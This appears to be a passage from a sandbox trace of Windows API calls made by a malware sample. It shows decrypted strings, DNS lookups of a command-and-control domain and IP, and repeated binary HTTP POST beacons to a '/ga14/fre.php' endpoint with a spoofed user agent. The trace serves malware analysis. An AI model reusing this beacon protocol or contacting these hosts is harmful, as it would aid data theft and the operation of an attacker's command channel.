0x76a90000 [0304.297] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0304.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.298] CryptDestroyKey (hKey=0x87e270) returned 1 [0304.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.299] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0304.299] GetProcessHeap () returned 0x840000 [0304.299] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0304.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.300] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0304.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.301] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0304.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.302] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0304.302] GetProcessHeap () returned 0x840000 [0304.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0304.302] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0304.307] GetProcessHeap () returned 0x840000 [0304.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0304.307] socket (af=2, type=1, protocol=6) returned 0x4f8 [0304.307] connect (s=0x4f8, name=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0304.374] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0304.374] GetProcessHeap () returned 0x840000 [0304.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0304.374] GetProcessHeap () returned 0x840000 [0304.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0304.375] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0304.376] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0304.376] GetProcessHeap () returned 0x840000 [0304.376] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0304.376] GetProcessHeap () returned 0x840000 [0304.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0304.376] GetProcessHeap () returned 0x840000 [0304.376] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc68 [0304.376] GetProcessHeap () returned 0x840000 [0304.377] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0304.377] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0304.378] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0304.379] GetProcessHeap () returned 0x840000 [0304.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0304.379] GetProcessHeap () returned 0x840000 [0304.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0304.379] send (s=0x4f8, buf=0x873a58*, len=237, flags=0) returned 237 [0304.379] send (s=0x4f8, buf=0x87eb58*, len=159, flags=0) returned 159 [0304.379] GetProcessHeap () returned 0x840000 [0304.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0304.379] recv (in: s=0x4f8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0304.735] GetProcessHeap () returned 0x840000 [0304.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0304.735] GetProcessHeap () returned 0x840000 [0304.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0304.735] GetProcessHeap () returned 0x840000 [0304.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0304.735] GetProcessHeap () returned 0x840000 [0304.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0304.735] closesocket (s=0x4f8) returned 0 [0304.736] GetProcessHeap () returned 0x840000 [0304.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0304.736] GetProcessHeap () returned 0x840000 [0304.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0304.736] GetProcessHeap () returned 0x840000 [0304.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0304.736] GetProcessHeap () returned 0x840000 [0304.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0304.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1314) returned 0x4f8 [0304.743] Sleep (dwMilliseconds=0xea60) [0304.748] GetProcessHeap () returned 0x840000 [0304.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0304.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0304.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.756] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0304.762] GetProcessHeap () returned 0x840000 [0304.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0304.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.762] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0304.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.763] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0304.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.764] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.764] GetProcessHeap () returned 0x840000 [0304.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0304.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.765] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0304.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.766] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0304.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.767] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0304.767] GetProcessHeap () returned 0x840000 [0304.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0304.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.768] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.768] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.769] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.770] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.770] GetProcessHeap () returned 0x840000 [0304.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0304.770] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0304.770] GetProcessHeap () returned 0x840000 [0304.770] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0304.770] GetProcessHeap () returned 0x840000 [0304.771] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0304.771] GetProcessHeap () returned 0x840000 [0304.771] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0304.771] GetProcessHeap () returned 0x840000 [0304.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0304.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.771] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0304.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.776] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0304.781] GetProcessHeap () returned 0x840000 [0304.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0304.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.782] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0304.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.783] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0304.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.783] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.783] GetProcessHeap () returned 0x840000 [0304.783] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0304.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.784] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0304.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.785] CryptDestroyKey (hKey=0x87e930) returned 1 [0304.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0304.786] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0304.786] GetProcessHeap () returned 0x840000 [0304.786] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0304.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.786] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0304.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.787] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0304.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.788] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0304.788] GetProcessHeap () returned 0x840000 [0304.788] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0304.788] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0304.791] GetProcessHeap () returned 0x840000 [0304.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0304.792] socket (af=2, type=1, protocol=6) returned 0x4fc [0304.792] connect (s=0x4fc, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0304.866] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0304.866] GetProcessHeap () returned 0x840000 [0304.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0304.866] GetProcessHeap () returned 0x840000 [0304.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0304.867] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0304.868] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0304.868] GetProcessHeap () returned 0x840000 [0304.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0304.868] GetProcessHeap () returned 0x840000 [0304.868] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0304.868] GetProcessHeap () returned 0x840000 [0304.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0304.868] GetProcessHeap () returned 0x840000 [0304.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0304.869] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0304.869] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0304.869] GetProcessHeap () returned 0x840000 [0304.869] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0304.869] GetProcessHeap () returned 0x840000 [0304.869] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0304.870] send (s=0x4fc, buf=0x873a58*, len=237, flags=0) returned 237 [0304.870] send (s=0x4fc, buf=0x87eb58*, len=159, flags=0) returned 159 [0304.870] GetProcessHeap () returned 0x840000 [0304.870] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0304.870] recv (in: s=0x4fc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0305.250] GetProcessHeap () returned 0x840000 [0305.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0305.250] GetProcessHeap () returned 0x840000 [0305.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0305.250] GetProcessHeap () returned 0x840000 [0305.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0305.250] GetProcessHeap () returned 0x840000 [0305.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0305.250] closesocket (s=0x4fc) returned 0 [0305.251] GetProcessHeap () returned 0x840000 [0305.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0305.251] GetProcessHeap () returned 0x840000 [0305.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0305.251] GetProcessHeap () returned 0x840000 [0305.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0305.251] GetProcessHeap () returned 0x840000 [0305.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0305.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x35c) returned 0x4fc [0305.252] Sleep (dwMilliseconds=0xea60) [0305.272] GetProcessHeap () returned 0x840000 [0305.272] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0305.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.273] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0305.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.278] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0305.285] GetProcessHeap () returned 0x840000 [0305.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0305.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.286] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0305.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.287] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0305.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.288] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.288] GetProcessHeap () returned 0x840000 [0305.288] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0305.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.289] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0305.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.289] CryptDestroyKey (hKey=0x87e430) returned 1 [0305.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.290] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0305.290] GetProcessHeap () returned 0x840000 [0305.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0305.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.291] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.292] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.293] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.294] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.294] GetProcessHeap () returned 0x840000 [0305.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0305.294] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0305.294] GetProcessHeap () returned 0x840000 [0305.294] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0305.294] GetProcessHeap () returned 0x840000 [0305.294] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0305.294] GetProcessHeap () returned 0x840000 [0305.294] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0305.294] GetProcessHeap () returned 0x840000 [0305.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0305.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.295] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0305.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.307] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0305.313] GetProcessHeap () returned 0x840000 [0305.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0305.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.314] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0305.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.315] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0305.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.316] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.316] GetProcessHeap () returned 0x840000 [0305.316] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0305.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.317] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0305.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.318] CryptDestroyKey (hKey=0x87e270) returned 1 [0305.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.319] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0305.319] GetProcessHeap () returned 0x840000 [0305.319] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0305.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.320] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0305.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.321] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0305.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.322] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0305.322] GetProcessHeap () returned 0x840000 [0305.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0305.322] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0305.324] 